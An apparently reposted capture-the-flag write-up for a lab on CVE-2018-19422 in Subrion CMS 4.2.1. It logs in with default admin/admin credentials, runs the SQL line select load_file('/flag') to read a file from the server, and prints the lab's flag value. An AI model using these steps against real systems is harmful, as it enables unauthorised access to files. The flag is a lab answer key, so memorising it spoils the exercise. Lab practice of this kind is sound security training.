春秋云镜 CVE-2018-19422

春秋云镜 CVE-2018-19422 Subrion CMS 4.2.1 存在文件上传漏洞

靶标介绍

Subrion CMS 4.2.1 存在文件上传漏洞。CVE-2021-41947同一套cms。

启动场景

漏洞利用

admin/admin登陆后台管理界面
春秋云镜 CVE-2018-19422_第1张图片
执行SQL命令,获取flag select load_file('/flag');
春秋云镜 CVE-2018-19422_第2张图片
得到flag

flag{174a5457-b16f-4cbf-b17d-da6cf4522cc1}

你可能感兴趣的:(靶场,安全,web安全)